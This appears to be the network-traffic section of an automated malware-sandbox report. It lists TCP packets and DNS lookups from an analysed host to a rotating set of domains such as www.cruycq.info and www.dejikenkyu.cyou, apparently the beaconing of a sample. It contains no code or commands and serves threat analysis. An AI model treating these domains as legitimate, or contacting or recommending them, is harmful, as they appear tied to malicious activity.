                                                                                                                    Dec 24, 2024 11:37:09.446358919 CET8049888199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:09.446393967 CET8049888199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:09.446990013 CET8049888199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:09.447084904 CET8049888199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:10.415359020 CET8049888199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:10.415412903 CET8049888199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:10.415455103 CET8049888199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:10.415474892 CET4988880192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:10.415563107 CET4988880192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:10.837013960 CET4988880192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:11.855607033 CET4989680192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:11.975439072 CET8049896199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:11.975601912 CET4989680192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:11.990228891 CET4989680192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:12.110079050 CET8049896199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:13.071743011 CET8049896199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:13.071909904 CET8049896199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:13.071921110 CET8049896199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:13.072050095 CET4989680192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:13.074561119 CET4989680192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:13.194183111 CET8049896199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:18.624855995 CET4991480192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:18.744534016 CET8049914199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:18.744636059 CET4991480192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:18.759177923 CET4991480192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:18.878803015 CET8049914199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:19.919882059 CET8049914199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:19.919905901 CET8049914199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:19.919946909 CET8049914199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:19.920043945 CET4991480192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:20.274885893 CET4991480192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:21.293298006 CET4992080192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:21.412914991 CET8049920199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:21.412991047 CET4992080192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:21.428368092 CET4992080192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:21.548959970 CET8049920199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:22.508752108 CET8049920199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:22.508766890 CET8049920199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:22.508776903 CET8049920199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:22.508821964 CET4992080192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:22.930984974 CET4992080192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:23.950136900 CET4992680192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:24.069658041 CET8049926199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:24.069734097 CET4992680192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:24.084553003 CET4992680192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:24.204220057 CET8049926199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:24.204257011 CET8049926199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:24.204375982 CET8049926199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:24.204395056 CET8049926199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:24.204484940 CET8049926199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:24.204500914 CET8049926199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:24.204600096 CET8049926199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:24.204608917 CET8049926199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:24.204638958 CET8049926199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:25.178599119 CET8049926199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:25.178627968 CET8049926199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:25.178644896 CET8049926199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:25.178949118 CET4992680192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:25.178949118 CET4992680192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:25.587235928 CET4992680192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:26.605763912 CET4993380192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:26.725394011 CET8049933199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:26.725488901 CET4993380192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:26.735771894 CET4993380192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:26.855300903 CET8049933199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:27.820919991 CET8049933199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:27.821013927 CET8049933199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:27.821197987 CET4993380192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:27.821254969 CET8049933199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:27.821301937 CET4993380192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:27.824210882 CET4993380192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:27.943667889 CET8049933199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:33.359664917 CET4995080192.168.2.447.83.1.90
                                                                                                                    Dec 24, 2024 11:37:33.479304075 CET804995047.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:33.479392052 CET4995080192.168.2.447.83.1.90
                                                                                                                    Dec 24, 2024 11:37:33.494384050 CET4995080192.168.2.447.83.1.90
                                                                                                                    Dec 24, 2024 11:37:33.614078999 CET804995047.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:35.009227991 CET4995080192.168.2.447.83.1.90
                                                                                                                    Dec 24, 2024 11:37:35.129209042 CET804995047.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:35.129275084 CET4995080192.168.2.447.83.1.90
                                                                                                                    Dec 24, 2024 11:37:36.029334068 CET4995980192.168.2.447.83.1.90
                                                                                                                    Dec 24, 2024 11:37:36.149075031 CET804995947.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:36.149240017 CET4995980192.168.2.447.83.1.90
                                                                                                                    Dec 24, 2024 11:37:36.163964033 CET4995980192.168.2.447.83.1.90
                                                                                                                    Dec 24, 2024 11:37:36.283734083 CET804995947.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:37.665319920 CET4995980192.168.2.447.83.1.90
                                                                                                                    Dec 24, 2024 11:37:37.785162926 CET804995947.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:37.785244942 CET4995980192.168.2.447.83.1.90
                                                                                                                    Dec 24, 2024 11:37:38.685116053 CET4996580192.168.2.447.83.1.90
                                                                                                                    Dec 24, 2024 11:37:38.804701090 CET804996547.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:38.804819107 CET4996580192.168.2.447.83.1.90
                                                                                                                    Dec 24, 2024 11:37:38.825289011 CET4996580192.168.2.447.83.1.90
                                                                                                                    Dec 24, 2024 11:37:38.944989920 CET804996547.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:38.945022106 CET804996547.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:38.945094109 CET804996547.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:38.945215940 CET804996547.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:38.945226908 CET804996547.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:38.945235014 CET804996547.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:38.945266962 CET804996547.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:38.945276976 CET804996547.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:38.945343971 CET804996547.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:40.337290049 CET4996580192.168.2.447.83.1.90
                                                                                                                    Dec 24, 2024 11:37:40.457209110 CET804996547.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:40.457318068 CET4996580192.168.2.447.83.1.90
                                                                                                                    Dec 24, 2024 11:37:41.356379032 CET4997180192.168.2.447.83.1.90
                                                                                                                    Dec 24, 2024 11:37:41.476315022 CET804997147.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:41.476475954 CET4997180192.168.2.447.83.1.90
                                                                                                                    Dec 24, 2024 11:37:41.486989021 CET4997180192.168.2.447.83.1.90
                                                                                                                    Dec 24, 2024 11:37:41.606611013 CET804997147.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:43.688059092 CET804997147.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:43.688251972 CET804997147.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:43.688311100 CET4997180192.168.2.447.83.1.90
                                                                                                                    Dec 24, 2024 11:37:43.690851927 CET4997180192.168.2.447.83.1.90
                                                                                                                    Dec 24, 2024 11:37:43.810497046 CET804997147.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:49.124932051 CET4999180192.168.2.4104.21.80.1
                                                                                                                    Dec 24, 2024 11:37:49.244520903 CET8049991104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:49.244663954 CET4999180192.168.2.4104.21.80.1
                                                                                                                    Dec 24, 2024 11:37:49.262809038 CET4999180192.168.2.4104.21.80.1
                                                                                                                    Dec 24, 2024 11:37:49.382877111 CET8049991104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:50.777314901 CET4999180192.168.2.4104.21.80.1
                                                                                                                    Dec 24, 2024 11:37:50.897320032 CET8049991104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:50.897387981 CET4999180192.168.2.4104.21.80.1
                                                                                                                    Dec 24, 2024 11:37:51.793726921 CET4999780192.168.2.4104.21.80.1
                                                                                                                    Dec 24, 2024 11:37:51.913423061 CET8049997104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:51.915857077 CET4999780192.168.2.4104.21.80.1
                                                                                                                    Dec 24, 2024 11:37:51.932306051 CET4999780192.168.2.4104.21.80.1
                                                                                                                    Dec 24, 2024 11:37:52.051830053 CET8049997104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:53.446671963 CET4999780192.168.2.4104.21.80.1
                                                                                                                    Dec 24, 2024 11:37:53.566554070 CET8049997104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:53.566708088 CET4999780192.168.2.4104.21.80.1
                                                                                                                    Dec 24, 2024 11:37:54.466581106 CET5000480192.168.2.4104.21.80.1
                                                                                                                    Dec 24, 2024 11:37:54.586312056 CET8050004104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:54.586441040 CET5000480192.168.2.4104.21.80.1
                                                                                                                    Dec 24, 2024 11:37:54.601563931 CET5000480192.168.2.4104.21.80.1
                                                                                                                    Dec 24, 2024 11:37:54.721323013 CET8050004104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:54.721338987 CET8050004104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:54.721415997 CET8050004104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:54.721430063 CET8050004104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:54.721445084 CET8050004104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:54.721636057 CET8050004104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:54.721649885 CET8050004104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:54.721740007 CET8050004104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:54.721755028 CET8050004104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:56.102994919 CET5000480192.168.2.4104.21.80.1
                                                                                                                    Dec 24, 2024 11:37:56.174464941 CET8050004104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:56.174500942 CET8050004104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:56.174524069 CET5000480192.168.2.4104.21.80.1
Dec 24, 2024 11:37:56.174542904 CET | 50004 | 80 | 192.168.2.4 | 104.21.80.1
Dec 24, 2024 11:37:56.175446033 CET | 80 | 50004 | 104.21.80.1 | 192.168.2.4
Dec 24, 2024 11:37:56.175488949 CET | 50004 | 80 | 192.168.2.4 | 104.21.80.1
Dec 24, 2024 11:37:56.222770929 CET | 80 | 50004 | 104.21.80.1 | 192.168.2.4
Dec 24, 2024 11:37:56.222824097 CET | 50004 | 80 | 192.168.2.4 | 104.21.80.1
Dec 24, 2024 11:37:57.121896982 CET | 50012 | 80 | 192.168.2.4 | 104.21.80.1
Dec 24, 2024 11:37:57.241511106 CET | 80 | 50012 | 104.21.80.1 | 192.168.2.4
Dec 24, 2024 11:37:57.241734028 CET | 50012 | 80 | 192.168.2.4 | 104.21.80.1
Dec 24, 2024 11:37:57.250525951 CET | 50012 | 80 | 192.168.2.4 | 104.21.80.1
Dec 24, 2024 11:37:57.370019913 CET | 80 | 50012 | 104.21.80.1 | 192.168.2.4
Dec 24, 2024 11:37:59.023072004 CET | 80 | 50012 | 104.21.80.1 | 192.168.2.4
Dec 24, 2024 11:37:59.023078918 CET | 80 | 50012 | 104.21.80.1 | 192.168.2.4
Dec 24, 2024 11:37:59.023192883 CET | 80 | 50012 | 104.21.80.1 | 192.168.2.4
Dec 24, 2024 11:37:59.023202896 CET | 50012 | 80 | 192.168.2.4 | 104.21.80.1
Dec 24, 2024 11:37:59.023255110 CET | 50012 | 80 | 192.168.2.4 | 104.21.80.1
Dec 24, 2024 11:37:59.026025057 CET | 50012 | 80 | 192.168.2.4 | 104.21.80.1
Dec 24, 2024 11:37:59.145617008 CET | 80 | 50012 | 104.21.80.1 | 192.168.2.4
Dec 24, 2024 11:38:05.121207952 CET | 50030 | 80 | 192.168.2.4 | 85.159.66.93
Dec 24, 2024 11:38:05.240835905 CET | 80 | 50030 | 85.159.66.93 | 192.168.2.4
Dec 24, 2024 11:38:05.240921021 CET | 50030 | 80 | 192.168.2.4 | 85.159.66.93
Dec 24, 2024 11:38:05.256869078 CET | 50030 | 80 | 192.168.2.4 | 85.159.66.93
Dec 24, 2024 11:38:05.376653910 CET | 80 | 50030 | 85.159.66.93 | 192.168.2.4
Dec 24, 2024 11:38:06.759331942 CET | 50030 | 80 | 192.168.2.4 | 85.159.66.93
Dec 24, 2024 11:38:06.879332066 CET | 80 | 50030 | 85.159.66.93 | 192.168.2.4
Dec 24, 2024 11:38:06.879434109 CET | 50030 | 80 | 192.168.2.4 | 85.159.66.93
Dec 24, 2024 11:38:07.777909994 CET | 50036 | 80 | 192.168.2.4 | 85.159.66.93
Dec 24, 2024 11:38:07.897418976 CET | 80 | 50036 | 85.159.66.93 | 192.168.2.4
Dec 24, 2024 11:38:07.897569895 CET | 50036 | 80 | 192.168.2.4 | 85.159.66.93
Dec 24, 2024 11:38:07.912138939 CET | 50036 | 80 | 192.168.2.4 | 85.159.66.93
Dec 24, 2024 11:38:08.031696081 CET | 80 | 50036 | 85.159.66.93 | 192.168.2.4
Dec 24, 2024 11:38:09.415625095 CET | 50036 | 80 | 192.168.2.4 | 85.159.66.93
Dec 24, 2024 11:38:09.535366058 CET | 80 | 50036 | 85.159.66.93 | 192.168.2.4
Dec 24, 2024 11:38:09.535440922 CET | 50036 | 80 | 192.168.2.4 | 85.159.66.93
Dec 24, 2024 11:38:10.434544086 CET | 50040 | 80 | 192.168.2.4 | 85.159.66.93
Dec 24, 2024 11:38:10.554227114 CET | 80 | 50040 | 85.159.66.93 | 192.168.2.4
Dec 24, 2024 11:38:10.554579020 CET | 50040 | 80 | 192.168.2.4 | 85.159.66.93
Dec 24, 2024 11:38:10.569849014 CET | 50040 | 80 | 192.168.2.4 | 85.159.66.93
Dec 24, 2024 11:38:10.689357996 CET | 80 | 50040 | 85.159.66.93 | 192.168.2.4
Dec 24, 2024 11:38:10.689438105 CET | 80 | 50040 | 85.159.66.93 | 192.168.2.4
Dec 24, 2024 11:38:10.689459085 CET | 80 | 50040 | 85.159.66.93 | 192.168.2.4
Dec 24, 2024 11:38:10.689526081 CET | 80 | 50040 | 85.159.66.93 | 192.168.2.4
Dec 24, 2024 11:38:10.689538956 CET | 80 | 50040 | 85.159.66.93 | 192.168.2.4
Dec 24, 2024 11:38:10.689651012 CET | 80 | 50040 | 85.159.66.93 | 192.168.2.4
Dec 24, 2024 11:38:10.689663887 CET | 80 | 50040 | 85.159.66.93 | 192.168.2.4
Dec 24, 2024 11:38:10.689723015 CET | 80 | 50040 | 85.159.66.93 | 192.168.2.4
Dec 24, 2024 11:38:10.689745903 CET | 80 | 50040 | 85.159.66.93 | 192.168.2.4
Dec 24, 2024 11:38:12.071886063 CET | 50040 | 80 | 192.168.2.4 | 85.159.66.93
Dec 24, 2024 11:38:12.191833973 CET | 80 | 50040 | 85.159.66.93 | 192.168.2.4
Dec 24, 2024 11:38:12.191929102 CET | 50040 | 80 | 192.168.2.4 | 85.159.66.93
Dec 24, 2024 11:38:13.090604067 CET | 50041 | 80 | 192.168.2.4 | 85.159.66.93
Dec 24, 2024 11:38:13.210298061 CET | 80 | 50041 | 85.159.66.93 | 192.168.2.4
Dec 24, 2024 11:38:13.210382938 CET | 50041 | 80 | 192.168.2.4 | 85.159.66.93
Dec 24, 2024 11:38:13.224646091 CET | 50041 | 80 | 192.168.2.4 | 85.159.66.93
Dec 24, 2024 11:38:13.344698906 CET | 80 | 50041 | 85.159.66.93 | 192.168.2.4
Dec 24, 2024 11:38:14.539556026 CET | 80 | 50041 | 85.159.66.93 | 192.168.2.4
Dec 24, 2024 11:38:14.539849997 CET | 80 | 50041 | 85.159.66.93 | 192.168.2.4
Dec 24, 2024 11:38:14.539915085 CET | 50041 | 80 | 192.168.2.4 | 85.159.66.93
Dec 24, 2024 11:38:14.542280912 CET | 50041 | 80 | 192.168.2.4 | 85.159.66.93
Dec 24, 2024 11:38:14.661988020 CET | 80 | 50041 | 85.159.66.93 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 24, 2024 11:36:01.676346064 CET | 54339 | 53 | 192.168.2.4 | 1.1.1.1
Dec 24, 2024 11:36:02.000214100 CET | 53 | 54339 | 1.1.1.1 | 192.168.2.4
Dec 24, 2024 11:36:18.371068954 CET | 63747 | 53 | 192.168.2.4 | 1.1.1.1
Dec 24, 2024 11:36:19.249984026 CET | 53 | 63747 | 1.1.1.1 | 192.168.2.4
Dec 24, 2024 11:36:33.496670961 CET | 62917 | 53 | 192.168.2.4 | 1.1.1.1
Dec 24, 2024 11:36:34.035727978 CET | 53 | 62917 | 1.1.1.1 | 192.168.2.4
Dec 24, 2024 11:36:48.262309074 CET | 62642 | 53 | 192.168.2.4 | 1.1.1.1
Dec 24, 2024 11:36:48.683394909 CET | 53 | 62642 | 1.1.1.1 | 192.168.2.4
Dec 24, 2024 11:37:03.039784908 CET | 49915 | 53 | 192.168.2.4 | 1.1.1.1
Dec 24, 2024 11:37:03.751362085 CET | 53 | 49915 | 1.1.1.1 | 192.168.2.4
Dec 24, 2024 11:37:18.091856003 CET | 54523 | 53 | 192.168.2.4 | 1.1.1.1
Dec 24, 2024 11:37:18.622483969 CET | 53 | 54523 | 1.1.1.1 | 192.168.2.4
Dec 24, 2024 11:37:32.841705084 CET | 58211 | 53 | 192.168.2.4 | 1.1.1.1
Dec 24, 2024 11:37:33.350106001 CET | 53 | 58211 | 1.1.1.1 | 192.168.2.4
Dec 24, 2024 11:37:48.700599909 CET | 56258 | 53 | 192.168.2.4 | 1.1.1.1
Dec 24, 2024 11:37:49.121373892 CET | 53 | 56258 | 1.1.1.1 | 192.168.2.4
Dec 24, 2024 11:38:04.044321060 CET | 60083 | 53 | 192.168.2.4 | 1.1.1.1
Dec 24, 2024 11:38:05.056231976 CET | 60083 | 53 | 192.168.2.4 | 1.1.1.1
Dec 24, 2024 11:38:05.118103027 CET | 53 | 60083 | 1.1.1.1 | 192.168.2.4
Dec 24, 2024 11:38:05.218214035 CET | 53 | 60083 | 1.1.1.1 | 192.168.2.4
Dec 24, 2024 11:38:19.840672970 CET | 63522 | 53 | 192.168.2.4 | 1.1.1.1
Dec 24, 2024 11:38:20.298772097 CET | 53 | 63522 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 24, 2024 11:36:01.676346064 CET | 192.168.2.4 | 1.1.1.1 | 0xb54f | Standard query (0) | www.bgezakofe.shop | A (IP address) | IN (0x0001) | false
Dec 24, 2024 11:36:18.371068954 CET | 192.168.2.4 | 1.1.1.1 | 0xd10 | Standard query (0) | www.techstarllc.cloud | A (IP address) | IN (0x0001) | false
Dec 24, 2024 11:36:33.496670961 CET | 192.168.2.4 | 1.1.1.1 | 0x5c | Standard query (0) | www.hokasportshoes.shop | A (IP address) | IN (0x0001) | false
Dec 24, 2024 11:36:48.262309074 CET | 192.168.2.4 | 1.1.1.1 | 0x2d84 | Standard query (0) | www.primetream.live | A (IP address) | IN (0x0001) | false
Dec 24, 2024 11:37:03.039784908 CET | 192.168.2.4 | 1.1.1.1 | 0x8b8d | Standard query (0) | www.sorket.tech | A (IP address) | IN (0x0001) | false
Dec 24, 2024 11:37:18.091856003 CET | 192.168.2.4 | 1.1.1.1 | 0x4493 | Standard query (0) | www.1337street.shop | A (IP address) | IN (0x0001) | false
Dec 24, 2024 11:37:32.841705084 CET | 192.168.2.4 | 1.1.1.1 | 0xea82 | Standard query (0) | www.cruycq.info | A (IP address) | IN (0x0001) | false
Dec 24, 2024 11:37:48.700599909 CET | 192.168.2.4 | 1.1.1.1 | 0x90c3 | Standard query (0) | www.dejikenkyu.cyou | A (IP address) | IN (0x0001) | false
Dec 24, 2024 11:38:04.044321060 CET | 192.168.2.4 | 1.1.1.1 | 0x3ee | Standard query (0) | www.letsbookcruise.xyz | A (IP address) | IN (0x0001) | false
Dec 24, 2024 11:38:05.056231976 CET | 192.168.2.4 | 1.1.1.1 | 0x3ee | Standard query (0) | www.letsbookcruise.xyz | A (IP address) | IN (0x0001) | false
Dec 24, 2024 11:38:19.840672970 CET | 192.168.2.4 | 1.1.1.1 | 0x3ee5 | Standard query (0) | www.stoauto.pro | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 24, 2024 11:36:02.000214100 CET | 1.1.1.1 | 192.168.2.4 | 0xb54f | No error (0) | www.bgezakofe.shop |  | 104.21.10.26 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 11:36:02.000214100 CET | 1.1.1.1 | 192.168.2.4 | 0xb54f | No error (0) | www.bgezakofe.shop |  | 172.67.189.219 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 11:36:19.249984026 CET | 1.1.1.1 | 192.168.2.4 | 0xd10 | No error (0) | www.techstarllc.cloud | techstarllc.cloud |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 24, 2024 11:36:19.249984026 CET | 1.1.1.1 | 192.168.2.4 | 0xd10 | No error (0) | techstarllc.cloud |  | 45.41.206.57 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 11:36:34.035727978 CET | 1.1.1.1 | 192.168.2.4 | 0x5c | No error (0) | www.hokasportshoes.shop | 94950.bodis.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 24, 2024 11:36:34.035727978 CET | 1.1.1.1 | 192.168.2.4 | 0x5c | No error (0) | 94950.bodis.com |  | 199.59.243.227 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 11:36:48.683394909 CET | 1.1.1.1 | 192.168.2.4 | 0x2d84 | No error (0) | www.primetream.live |  | 162.0.236.169 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 11:37:03.751362085 CET | 1.1.1.1 | 192.168.2.4 | 0x8b8d | No error (0) | www.sorket.tech |  | 199.59.243.227 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 11:37:18.622483969 CET | 1.1.1.1 | 192.168.2.4 | 0x4493 | No error (0) | www.1337street.shop | 94950.bodis.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 24, 2024 11:37:18.622483969 CET | 1.1.1.1 | 192.168.2.4 | 0x4493 | No error (0) | 94950.bodis.com |  | 199.59.243.227 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 11:37:33.350106001 CET | 1.1.1.1 | 192.168.2.4 | 0xea82 | No error (0) | www.cruycq.info |  | 47.83.1.90 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 11:37:49.121373892 CET | 1.1.1.1 | 192.168.2.4 | 0x90c3 | No error (0) | www.dejikenkyu.cyou |  | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 11:37:49.121373892 CET | 1.1.1.1 | 192.168.2.4 | 0x90c3 | No error (0) | www.dejikenkyu.cyou |  | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 11:37:49.121373892 CET | 1.1.1.1 | 192.168.2.4 | 0x90c3 | No error (0) | www.dejikenkyu.cyou |  | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 11:37:49.121373892 CET | 1.1.1.1 | 192.168.2.4 | 0x90c3 | No error (0) | www.dejikenkyu.cyou |  | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 11:37:49.121373892 CET | 1.1.1.1 | 192.168.2.4 | 0x90c3 | No error (0) | www.dejikenkyu.cyou |  | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 11:37:49.121373892 CET | 1.1.1.1 | 192.168.2.4 | 0x90c3 | No error (0) | www.dejikenkyu.cyou |  | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 11:37:49.121373892 CET | 1.1.1.1 | 192.168.2.4 | 0x90c3 | No error (0) | www.dejikenkyu.cyou |  | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 11:38:05.118103027 CET | 1.1.1.1 | 192.168.2.4 | 0x3ee | No error (0) | www.letsbookcruise.xyz | redirect.natrocdn.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 24, 2024 11:38:05.118103027 CET | 1.1.1.1 | 192.168.2.4 | 0x3ee | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 24, 2024 11:38:05.118103027 CET | 1.1.1.1 | 192.168.2.4 | 0x3ee | No error (0) | natroredirect.natrocdn.com |  | 85.159.66.93 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 11:38:05.218214035 CET | 1.1.1.1 | 192.168.2.4 | 0x3ee | No error (0) | www.letsbookcruise.xyz | redirect.natrocdn.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 24, 2024 11:38:05.218214035 CET | 1.1.1.1 | 192.168.2.4 | 0x3ee | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 24, 2024 11:38:05.218214035 CET | 1.1.1.1 | 192.168.2.4 | 0x3ee | No error (0) | natroredirect.natrocdn.com |  | 85.159.66.93 | A (IP address) | IN (0x0001) | false
Dec 24, 2024 11:38:20.298772097 CET | 1.1.1.1 | 192.168.2.4 | 0x3ee5 | No error (0) | www.stoauto.pro |  | 194.58.112.174 | A (IP address) | IN (0x0001) | false
• www.bgezakofe.shop
• www.techstarllc.cloud
• www.hokasportshoes.shop
• www.primetream.live
• www.sorket.tech
• www.1337street.shop
• www.cruycq.info
• www.dejikenkyu.cyou
• www.letsbookcruise.xyz
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
